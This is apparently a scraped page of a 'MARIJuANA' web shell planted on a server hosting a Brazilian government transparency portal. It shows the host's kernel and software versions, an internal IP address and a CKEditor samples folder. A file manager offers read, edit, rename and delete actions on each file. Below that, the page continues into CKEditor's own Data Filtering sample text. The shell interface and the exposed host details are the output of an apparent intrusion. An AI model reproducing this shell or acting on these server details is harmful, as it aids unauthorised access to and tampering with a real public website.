MARIJuANA
— DIOS — NO — CREA — NADA — EN — VANO —
Linux instance-20230208-1745 6.8.0-1013-oracle #13~22.04.1-Ubuntu SMP Mon Sep 2 13:02:56 UTC 2024 x86_64
  SOFT : Apache/2.4.52 (Ubuntu) PHP : 8.1.2-1ubuntu2.19
/var/www/pocoes/portal/transparencia/assets/ckeditor/samples/old/
10.0.0.135

 
[ NAME ] [ SIZE ] [ PERM ] [ DATE ] [ ACT ]
+FILE +DIR
assets dir drwxrwxr-x 2021-07-19 09:15 R D
autocomplete dir drwxrwxr-x 2021-07-19 09:08 R D
dialog dir drwxrwxr-x 2021-07-19 09:15 R D
easyimage dir drwxrwxr-x 2021-07-19 09:08 R D
enterkey dir drwxrwxr-x 2021-07-19 09:08 R D
htmlwriter dir drwxrwxr-x 2021-07-19 09:33 R D
image2 dir drwxrwxr-x 2021-07-19 09:15 R D
magicline dir drwxrwxr-x 2021-07-19 09:08 R D
toolbar dir drwxrwxr-x 2021-07-19 09:08 R D
wysiwygarea dir drwxrwxr-x 2021-07-19 09:08 R D
xmas dir drwxrwxr-x 2021-07-19 09:08 R D
ajax.html 2.666 KB -rw-rw-r-- 2021-07-19 08:58 R E G D
api.html 7.191 KB -rw-rw-r-- 2021-07-19 08:58 R E G D
appendto.html 2.27 KB -rw-rw-r-- 2021-07-19 08:58 R E G D
datafiltering.html 46.568 KB -rw-rw-r-- 2021-07-19 08:58 R E G D
divreplace.html 4.584 KB -rw-rw-r-- 2021-07-19 08:58 R E G D
index.html 5.668 KB -rw-rw-r-- 2021-07-19 08:58 R E G D
inlineall.html 9.983 KB -rw-rw-r-- 2021-07-19 08:58 R E G D
inlinebycode.html 6.068 KB -rw-rw-r-- 2021-07-19 08:58 R E G D
inlinetextarea.html 4.828 KB -rw-rw-r-- 2021-07-19 08:58 R E G D
jquery.html 7.378 KB -rw-rw-r-- 2021-07-19 08:58 R E G D
readonly.html 2.882 KB -rw-rw-r-- 2021-07-19 08:58 R E G D
replacebyclass.html 6.87 KB -rw-rw-r-- 2021-07-19 08:58 R E G D
replacebycode.html 6.775 KB -rw-rw-r-- 2021-07-19 08:58 R E G D
sample.css 4.994 KB -rw-rw-r-- 2021-07-19 08:58 R E G D
sample.js 1.655 KB -rw-rw-r-- 2021-07-19 08:58 R E G D
sample_posteddata.php 0.79 KB -rw-rw-r-- 2021-07-19 08:58 R E G D
tabindex.html 2.371 KB -rw-rw-r-- 2021-07-19 08:58 R E G D
uicolor.html 2.567 KB -rw-rw-r-- 2021-07-19 08:58 R E G D
uilanguages.html 4.453 KB -rw-rw-r-- 2021-07-19 08:58 R E G D
xhtmlstyle.html 6.887 KB -rw-rw-r-- 2021-07-19 08:58 R E G D
REQUEST EXIT
Data Filtering — CKEditor Sample

CKEditor Samples » Data Filtering and Features Activation

This sample is not maintained anymore. Check out its brand new version in CKEditor SDK.

This sample page demonstrates the idea of Advanced Content Filter (ACF), a sophisticated tool that takes control over what kind of data is accepted by the editor and what kind of output is produced.

When and what is being filtered?

ACF controls every single source of data that comes to the editor. It process both HTML that is inserted manually (i.e. pasted by the user) and programmatically like:

editor.setData( '<p>Hello world!</p>' );

ACF discards invalid, useless HTML tags and attributes so the editor remains "clean" during runtime. ACF behaviour can be configured and adjusted for a particular case to prevent the output HTML (i.e. in CMS systems) from being polluted. This kind of filtering is a first, cl